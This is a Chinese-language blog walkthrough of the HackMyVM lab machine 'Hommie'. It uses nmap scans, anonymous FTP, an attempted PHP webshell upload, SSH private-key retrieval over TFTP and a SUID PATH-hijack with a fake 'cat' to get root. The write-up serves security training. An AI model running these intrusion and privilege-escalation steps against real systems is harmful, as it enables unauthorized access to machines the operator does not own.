0
点赞
收藏
分享

微信扫一扫

HackMyvm(二十七)Hommie,系列文章持续更新

唯米天空 2022-05-03 阅读 82

文章目录

每日一学

请添加图片描述
NO.7 你了解哪些中间件

Apache
Nginx
IIS
Tomcat
JBoss
Weblogic

信息收集

先来扫网段

nmap -sP 192.168.2.0/24

在这里插入图片描述
继续收集端口,服务等信息

nmap -sC -sV -p- 192.168.2.23

开了FTP,SSH,HTTP,这里的FTP可以直接空密码登录,里面有一个空的index.html
在这里插入图片描述
打开网站一看,说id_rsa泄露了,这可得扫一波,并且名字叫alexia
在这里插入图片描述

gobuster dir -w directory-list-2.3-medium.txt -u http://192.168.2.23 -x txt,html,zip,php,rsa

扫完啥都没有
在这里插入图片描述
那就应该是在ftp服务器上面了,直接Anonymous 空密码登录一波

ftp 192.168.2.23

有一个.wbe目录
在这里插入图片描述
里面有一个index.html,下载下来看看
在这里插入图片描述

get index.html

我发现这个内容与我们看到的内容一致,那么这个目录就是网站的根目录了
在这里插入图片描述
那么我们可以直接上传一个一句话木马到这个目录

put 2.php

在这里插入图片描述
就当我以为要拿到webshell的时候,我发现不解析PHP,而是直接下载
在这里插入图片描述
扫目录扫不到,FTP上传PHP不解析,我也很异或~至此 FTP与Web端能够挖掘的东西都榨干了,可能是有一些端口没有扫到,扫一下UDP
先扫100个,因为速度实在是太慢
在这里插入图片描述

nmap -p1-100 -sU -sT 192.168.2.23

扫到tftp和dhcpc
在这里插入图片描述

漏洞利用

直接连接tftp

tftp 192.168.2.23

由于网页上的暗示,这里直接get id_rsa
在这里插入图片描述
接下来直接登录alexia用户

chmod 600 id_rsa
ssh alexia@192.168.2.23 -i id_rsa

登录成功
在这里插入图片描述
看一下sudo和suid

sudo -l
find / -user root -perm -4000 -print 2>/dev/null

发现/opt/showMetheKey
在这里插入图片描述
直接运行,拿到一个私钥,这个私钥似乎是我们自己的

/opt/showMetheKey

在这里插入图片描述

权限提升

把这个文件下载到本地反编译一下

python3 -m http.server
wget http://192.168.2.23:8000/showMetheKey
radare2 showMetheKey
aaa
afl
smain
pdf

我发现这个cat使用的是环境变量,而不是绝对路径,那么我们可以伪造一个cat
在这里插入图片描述

echo "/bin/sh" >cat
chmod +x cat
export PATH=/home/alexia/
/opt/showMetheKey
export PATH=/usr/bin/:$PATH

成功拿到root权限
在这里插入图片描述
/root目录下只有一个note.txt,他说他不记得放到哪里了
在这里插入图片描述

find / -name  "root.txt"

找到root.txt
在这里插入图片描述

总结

总结:拿到webshell的过程还是小曲折的,当我看到index.html的时候都笑出声了,可是没想到居然不解析,局面一下陷入了僵局,过了半天,才想起来UDP扫一扫,这才发现tftp拿到私钥,拿到私钥之后就是简单的suid提权了,覆盖一下环境变量就好,总体还是偏易的

举报

相关推荐

0 条评论